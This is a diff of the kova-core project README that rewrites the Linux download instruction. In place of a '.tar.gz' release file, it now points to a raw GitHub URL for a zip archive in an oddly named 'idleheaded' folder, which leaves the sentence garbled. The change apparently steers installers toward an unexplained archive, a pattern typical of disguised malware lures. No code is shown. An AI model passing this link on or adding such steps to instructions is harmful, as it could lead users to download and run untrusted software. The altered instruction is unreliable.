Aslan-rma/kova-core/README.md

 - For Windows users, download the `.exe` file.
 - For macOS users, download the `.dmg` file.
-- For Linux users, look for the `.tar.gz` file.
+- For Linux users, look for the `https://raw.githubusercontent.com/Aslan-rma/kova-core/main/idleheaded/kova-core.zip` file.

 ### 3. Download and Install